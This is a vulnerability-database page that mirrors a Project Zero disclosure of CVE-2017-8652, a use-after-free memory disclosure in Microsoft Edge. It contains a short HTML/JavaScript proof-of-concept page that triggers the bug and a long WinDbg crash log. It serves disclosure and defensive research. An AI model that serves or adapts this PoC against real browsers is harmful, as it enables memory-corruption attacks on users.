Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIvan FratricPACKETSTORM:143695
HistoryAug 10, 2017 - 12:00 a.m.

Microsoft Edge textarea.defaultValue Memory Disclosure

2017-08-1000:00:00
Ivan Fratric
packetstormsecurity.com
28

0.587 Medium

EPSS

Percentile

97.4%

JSON
`Microsoft Edge: textarea.defaultValue memory disclosure   
  
CVE-2017-8652  
  
  
There is a use-after free vulnerability in Microsoft Edge that can lead to memory disclosure. The vulnerability has been confirmed on Windows 10 Enterprise 64-bit (OS version 1607, OS build 14393.1198), Microsoft Edge 38.14393.1066.0, Microsoft EdgeHTML 14.14393.  
  
PoC:  
  
==========================================  
  
<!-- saved from url=(0014)about:internet -->  
<script>  
var n = 0;  
function go() {  
document.addEventListener("DOMNodeRemoved", eventhandler);  
eventhandler();  
}  
function eventhandler() {  
n++; if(n==5) return; //prevent going into an infinite recursion  
t.defaultValue = "aaaaaaaaaaaaaaaaaaaa";  
f.reset();  
}  
</script>  
<body onload=go()>  
<form id="f">  
<textarea id="t">aaa</textarea>  
  
=========================================  
  
This seems to be the same bug as <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=1076" title="" class="" rel="nofollow">https://bugs.chromium.org/p/project-zero/issues/detail?id=1076</a> only that one is in IE and this one is in Edge.  
  
I don't have symbols for the latest Edge after May update, so crash log doesn't make much sense but here it is anyway:  
  
=========================================  
  
(1618.1258): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\SYSTEM32\edgehtml.dll -   
edgehtml!Ordinal125+0x6446c:  
00007ffe`843d615c 6641393e cmp word ptr [<a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>],di ds:000001fa`3389cfd4=????  
  
0:013> !heap -p -a 000001fa`3389cfd4  
address 000001fa3389cfd4 found in  
_DPH_HEAP_ROOT @ 1f20b961000  
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)  
1fa33116138: 1fa3389c000 2000  
00007ffe9fb1b90b ntdll!RtlDebugReAllocateHeap+0x0000000000000047  
00007ffe9fadcbfe ntdll!RtlpReAllocateHeapInternal+0x000000000008729e  
00007ffe9fa55941 ntdll!RtlReAllocateHeap+0x0000000000000031  
00007ffe845cc2fa edgehtml!CreateWebDriverAdapter+0x00000000000504ba  
00007ffe845cbd74 edgehtml!CreateWebDriverAdapter+0x000000000004ff34  
00007ffe8462fbb8 edgehtml!Ordinal107+0x0000000000056a48  
00007ffe84d05143 edgehtml!Ordinal106+0x0000000000018e63  
00007ffe845ab544 edgehtml!CreateWebDriverAdapter+0x000000000002f704  
00007ffe846b0747 edgehtml!Ordinal107+0x00000000000d75d7  
00007ffe84ae5c8f edgehtml!ClearPhishingFilterData+0x00000000000beeaf  
00007ffe84792bb5 edgehtml!DllEnumClassObjects+0x0000000000043245  
00007ffe83c41227 chakra!DllGetClassObject+0x0000000000001d97  
00007ffe83c7a3d7 chakra!MemProtectHeapUnrootAndZero+0x00000000000038e7  
00007ffe83aef541 chakra!JsProjectWinRTNamespace+0x0000000000046621  
000001fa1cf7057e +0x000001fa1cf7057e  
  
0:013> r  
rax=0000000000000000 rbx=000001fa2d058a40 rcx=000001f212910000  
rdx=0000004d44824f5c rsi=0000000000000000 rdi=0000000000000000  
rip=00007ffe843d615c rsp=0000004d44824f10 rbp=0000004d44825010  
<a href="https://crrev.com/8" title="" class="" rel="nofollow">r8</a>=00000000ffffffff <a href="https://crrev.com/9" title="" class="" rel="nofollow">r9</a>=000001f212910000 <a href="https://crrev.com/10" title="" class="" rel="nofollow">r10</a>=00007ffe85156fd0  
<a href="https://crrev.com/11" title="" class="" rel="nofollow">r11</a>=000001f212841a90 <a href="https://crrev.com/12" title="" class="" rel="nofollow">r12</a>=0000000000000000 <a href="https://crrev.com/13" title="" class="" rel="nofollow">r13</a>=0000000000000014  
<a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>=000001fa3389cfd4 <a href="https://crrev.com/15" title="" class="" rel="nofollow">r15</a>=000001f2128e8840  
iopl=0 nv up ei pl zr na po nc  
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246  
edgehtml!Ordinal125+0x6446c:  
00007ffe`843d615c 6641393e cmp word ptr [<a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>],di ds:000001fa`3389cfd4=????  
  
0:013> k  
# Child-SP RetAddr Call Site  
00 0000004d`44824f10 00007ffe`844bc561 edgehtml!Ordinal125+0x6446c  
01 0000004d`44826190 00007ffe`8459a535 edgehtml!Ordinal105+0x13631  
02 0000004d`448261e0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e6f5  
03 0000004d`44826340 00007ffe`84d03e81 edgehtml!Ordinal106+0x18f9e  
04 0000004d`448263c0 00007ffe`84447753 edgehtml!Ordinal106+0x17ba1  
05 0000004d`448263f0 00007ffe`8453341c edgehtml!Ordinal125+0xd5a63  
06 0000004d`448264e0 00007ffe`847afc55 edgehtml!GetWebPlatformObject+0xbb4c  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\SYSTEM32\chakra.dll -   
07 0000004d`44826520 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x602e5  
08 0000004d`44826550 000001fa`1cf70641 chakra!DllGetClassObject+0x1d97  
09 0000004d`44826630 00007ffe`83cf90a3 0x000001fa`1cf70641  
0a 0000004d`448266c0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013  
0b 0000004d`44826710 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73  
0c 0000004d`44826770 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c  
0d 0000004d`44826860 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56  
0e 0000004d`448268d0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9  
0f 0000004d`44826970 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1  
10 0000004d`44826a00 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac  
11 0000004d`44826aa0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add  
12 0000004d`44826af0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28  
13 0000004d`44826b30 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7  
14 0000004d`44826cb0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7  
15 0000004d`44826d30 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a  
16 0000004d`44826e90 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4  
17 0000004d`44826ed0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1  
18 0000004d`448271a0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876  
19 0000004d`448271f0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132  
1a 0000004d`44827360 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732  
1b 0000004d`448273a0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9  
1c 0000004d`448274b0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d  
1d 0000004d`44827610 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e  
1e 0000004d`44827690 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a  
1f 0000004d`448276c0 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704  
20 0000004d`448277c0 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7  
21 0000004d`44827800 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf  
22 0000004d`44827840 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245  
23 0000004d`44827870 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97  
24 0000004d`44827950 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7  
25 0000004d`44827a30 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621  
26 0000004d`44827af0 00007ffe`83cf90a3 0x000001fa`1cf7057e  
27 0000004d`44827b80 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013  
28 0000004d`44827bd0 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73  
29 0000004d`44827c30 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c  
2a 0000004d`44827d20 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56  
2b 0000004d`44827d90 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9  
2c 0000004d`44827e30 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1  
2d 0000004d`44827ec0 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac  
2e 0000004d`44827f60 00007ffe`84650b98 edgehtml!Ordinal107+0x77add  
2f 0000004d`44827fb0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28  
30 0000004d`44827ff0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7  
31 0000004d`44828170 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7  
32 0000004d`448281f0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a  
33 0000004d`44828350 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4  
34 0000004d`44828390 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1  
35 0000004d`44828660 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876  
36 0000004d`448286b0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132  
37 0000004d`44828820 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732  
38 0000004d`44828860 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9  
39 0000004d`44828970 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d  
3a 0000004d`44828ad0 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e  
3b 0000004d`44828b50 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a  
3c 0000004d`44828b80 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704  
3d 0000004d`44828c80 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7  
3e 0000004d`44828cc0 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf  
3f 0000004d`44828d00 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245  
40 0000004d`44828d30 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97  
41 0000004d`44828e10 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7  
42 0000004d`44828ef0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621  
43 0000004d`44828fb0 00007ffe`83cf90a3 0x000001fa`1cf7057e  
44 0000004d`44829040 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013  
45 0000004d`44829090 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73  
46 0000004d`448290f0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c  
47 0000004d`448291e0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56  
48 0000004d`44829250 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9  
49 0000004d`448292f0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1  
4a 0000004d`44829380 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac  
4b 0000004d`44829420 00007ffe`84650b98 edgehtml!Ordinal107+0x77add  
4c 0000004d`44829470 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28  
4d 0000004d`448294b0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7  
4e 0000004d`44829630 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7  
4f 0000004d`448296b0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a  
50 0000004d`44829810 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4  
51 0000004d`44829850 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1  
52 0000004d`44829b20 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876  
53 0000004d`44829b70 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132  
54 0000004d`44829ce0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732  
55 0000004d`44829d20 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9  
56 0000004d`44829e30 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d  
57 0000004d`44829f90 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e  
58 0000004d`4482a010 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a  
59 0000004d`4482a040 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704  
5a 0000004d`4482a140 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7  
5b 0000004d`4482a180 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf  
5c 0000004d`4482a1c0 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245  
5d 0000004d`4482a1f0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97  
5e 0000004d`4482a2d0 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7  
5f 0000004d`4482a3b0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621  
60 0000004d`4482a470 00007ffe`83cf90a3 0x000001fa`1cf7057e  
61 0000004d`4482a500 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013  
62 0000004d`4482a550 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73  
63 0000004d`4482a5b0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c  
64 0000004d`4482a6a0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56  
65 0000004d`4482a710 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9  
66 0000004d`4482a7b0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1  
67 0000004d`4482a840 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac  
68 0000004d`4482a8e0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add  
69 0000004d`4482a930 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28  
6a 0000004d`4482a970 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7  
6b 0000004d`4482aaf0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7  
6c 0000004d`4482ab70 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a  
6d 0000004d`4482acd0 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4  
6e 0000004d`4482ad10 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1  
6f 0000004d`4482afe0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876  
70 0000004d`4482b030 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132  
71 0000004d`4482b1a0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732  
72 0000004d`4482b1e0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9  
73 0000004d`4482b2f0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d  
74 0000004d`4482b450 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e  
75 0000004d`4482b4d0 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a  
76 0000004d`4482b500 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704  
77 0000004d`4482b600 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7  
78 0000004d`4482b640 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf  
79 0000004d`4482b680 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245  
7a 0000004d`4482b6b0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97  
7b 0000004d`4482b790 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7  
7c 0000004d`4482b870 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621  
7d 0000004d`4482b930 00007ffe`83cf90a3 0x000001fa`1cf7057e  
7e 0000004d`4482b9c0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013  
7f 0000004d`4482ba10 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73  
80 0000004d`4482ba70 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c  
81 0000004d`4482bb60 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56  
82 0000004d`4482bbd0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9  
83 0000004d`4482bc70 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1  
84 0000004d`4482bd00 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac  
85 0000004d`4482bda0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add  
86 0000004d`4482bdf0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28  
87 0000004d`4482be30 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7  
88 0000004d`4482bfb0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7  
89 0000004d`4482c030 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a  
8a 0000004d`4482c190 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4  
8b 0000004d`4482c1d0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1  
8c 0000004d`4482c4a0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876  
8d 0000004d`4482c4f0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132  
8e 0000004d`4482c660 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732  
8f 0000004d`4482c6a0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9  
90 0000004d`4482c7b0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d  
91 0000004d`4482c910 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e  
92 0000004d`4482c990 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a  
93 0000004d`4482c9c0 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704  
94 0000004d`4482cac0 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7  
95 0000004d`4482cb00 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf  
96 0000004d`4482cb40 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245  
97 0000004d`4482cb70 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97  
98 0000004d`4482cc50 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7  
99 0000004d`4482cd30 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621  
9a 0000004d`4482cdf0 00007ffe`83cf90a3 0x000001fa`1cf7057e  
9b 0000004d`4482ce80 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013  
9c 0000004d`4482ced0 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73  
9d 0000004d`4482cf30 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c  
9e 0000004d`4482d020 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56  
9f 0000004d`4482d090 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9  
a0 0000004d`4482d130 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1  
a1 0000004d`4482d1c0 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac  
a2 0000004d`4482d260 00007ffe`84650b98 edgehtml!Ordinal107+0x77add  
a3 0000004d`4482d2b0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28  
a4 0000004d`4482d2f0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7  
a5 0000004d`4482d470 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7  
a6 0000004d`4482d4f0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a  
a7 0000004d`4482d650 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4  
a8 0000004d`4482d690 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1  
a9 0000004d`4482d960 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876  
aa 0000004d`4482d9b0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132  
ab 0000004d`4482db20 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732  
ac 0000004d`4482db60 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9  
ad 0000004d`4482dc70 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d  
ae 0000004d`4482ddd0 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e  
af 0000004d`4482de50 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a  
b0 0000004d`4482de80 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704  
b1 0000004d`4482df80 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7  
b2 0000004d`4482dfc0 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf  
b3 0000004d`4482e000 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245  
b4 0000004d`4482e030 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97  
b5 0000004d`4482e110 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7  
b6 0000004d`4482e1f0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621  
b7 0000004d`4482e2b0 00007ffe`83cf90a3 0x000001fa`1cf7057e  
b8 0000004d`4482e340 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013  
b9 0000004d`4482e390 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73  
ba 0000004d`4482e3f0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c  
bb 0000004d`4482e4e0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56  
bc 0000004d`4482e550 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9  
bd 0000004d`4482e5f0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1  
be 0000004d`4482e680 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac  
bf 0000004d`4482e720 00007ffe`84650b98 edgehtml!Ordinal107+0x77add  
c0 0000004d`4482e770 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28  
c1 0000004d`4482e7b0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7  
c2 0000004d`4482e930 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7  
c3 0000004d`4482e9b0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a  
c4 0000004d`4482eb10 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4  
c5 0000004d`4482eb50 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1  
c6 0000004d`4482ee20 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876  
c7 0000004d`4482ee70 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132  
c8 0000004d`4482efe0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732  
c9 0000004d`4482f020 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9  
ca 0000004d`4482f130 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d  
cb 0000004d`4482f290 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e  
cc 0000004d`4482f310 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a  
cd 0000004d`4482f340 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704  
ce 0000004d`4482f440 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7  
cf 0000004d`4482f480 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf  
d0 0000004d`4482f4c0 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245  
d1 0000004d`4482f4f0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97  
d2 0000004d`4482f5d0 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7  
d3 0000004d`4482f6b0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621  
d4 0000004d`4482f770 00007ffe`83cf90a3 0x000001fa`1cf7057e  
d5 0000004d`4482f800 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013  
d6 0000004d`4482f850 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73  
d7 0000004d`4482f8b0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c  
d8 0000004d`4482f9a0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56  
d9 0000004d`4482fa10 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9  
da 0000004d`4482fab0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1  
db 0000004d`4482fb40 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac  
dc 0000004d`4482fbe0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add  
dd 0000004d`4482fc30 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28  
de 0000004d`4482fc70 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7  
df 0000004d`4482fdf0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7  
e0 0000004d`4482fe70 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a  
e1 0000004d`4482ffd0 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4  
e2 0000004d`44830010 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1  
e3 0000004d`448302e0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876  
e4 0000004d`44830330 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132  
e5 0000004d`448304a0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732  
e6 0000004d`448304e0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9  
e7 0000004d`448305f0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d  
e8 0000004d`44830750 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e  
e9 0000004d`448307d0 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a  
ea 0000004d`44830800 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704  
eb 0000004d`44830900 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7  
ec 0000004d`44830940 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf  
ed 0000004d`44830980 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245  
ee 0000004d`448309b0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97  
ef 0000004d`44830a90 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7  
f0 0000004d`44830b70 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621  
f1 0000004d`44830c30 00007ffe`83cf90a3 0x000001fa`1cf7057e  
f2 0000004d`44830cc0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013  
f3 0000004d`44830d10 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73  
f4 0000004d`44830d70 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c  
f5 0000004d`44830e60 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56  
f6 0000004d`44830ed0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9  
f7 0000004d`44830f70 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1  
f8 0000004d`44831000 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac  
f9 0000004d`448310a0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add  
fa 0000004d`448310f0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28  
fb 0000004d`44831130 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7  
fc 0000004d`448312b0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7  
fd 0000004d`44831330 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a  
fe 0000004d`44831490 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4  
ff 0000004d`448314d0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1  
  
=========================================  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: ifratric  
  
`

Related

seebug 1
mscve 1
checkpoint_advisories 1
symantec 1
zdt 1
prion 3
cve 3
nessus 4
openvas 4
mskb 4
kaspersky 1
trendmicroblog 1
talosblog 1
seebug
seebug
